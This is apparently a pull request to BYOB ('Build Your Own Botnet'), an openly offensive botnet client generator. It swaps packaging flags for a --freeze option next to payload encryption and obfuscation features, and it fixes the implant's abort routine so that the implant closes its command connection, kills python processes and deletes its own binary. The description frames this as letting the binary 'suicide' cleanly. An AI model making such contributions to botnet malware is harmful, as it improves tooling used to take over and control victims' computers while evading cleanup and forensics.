### PR TITLE
client.py cosmetic update and payloads.py abort function fix

### DIFF
--- a/byob/client.py
+++ b/byob/client.py
@@ -3,7 +3,7 @@
 """Client Generator (Build Your Own Botnet)
 
 usage: client.py [-h] [-v] [--name NAME] [--icon ICON] [--pastebin API]
-                 [--encrypt] [--obfuscate] [--compress] [--exe] [--app]
+                 [--encrypt] [--obfuscate] [--compress] [--freeze]
                  host port [module [module ...]]
 
 Generator (Build Your Own Botnet)
@@ -22,8 +22,7 @@ optional arguments:
   --encrypt       encrypt payload and embed key in stager
   --obfuscate     obfuscate names of classes, functions & variables
   --compress      zip-compress into a self-executing python script
-  --exe           compile into a standalone bundled executable
-  --app           bundle into a standlone application
+  --freeze        compile client into a standalone executable for the current host platform
 
 Generate clients with the following features:
 

--- a/byob/core/payloads.py
+++ b/byob/core/payloads.py
@@ -489,8 +489,8 @@ class Payload():
             if not _debug:
                 delete(sys.argv[0])
         finally:
-            shutdown = threading.Thread(target=self.get_shutdown)
-            taskkill = threading.Thread(target=self.ps, args=('kill python',))
+            shutdown = threading.Thread(target=self.connection.close)
+            taskkill = threading.Thread(target=self.process, args=('kill python',))
             shutdown.start()
             taskkill.start()
             sys.exit()


### PR DESCRIPTION
Minor updates to client.py for move from --exe/--app to --freeze after commit for #27 

Fixed failures in abort function  …
The "abort" function had two issues;
* still mapped to "process" in what appears to have been
   the prior function name for it ("ps"). This was updated.
* was calling get_shutdown from self, which is only referenced in
   sockets from what I can tell. updated to point to "close" on
   socket to instruct the remote endpoint to gracefully tear down
   the connection before self-terminating.

  These fixes also allow for the clean-up process to fire, which
   appears to successfuly suicide the binary after abort.

Outstanding issues;
* server.py still had a message header error on abort, it returns
   an error message about length of message, I believe it is
   complaining somewhere in the "recv_task" callback during abort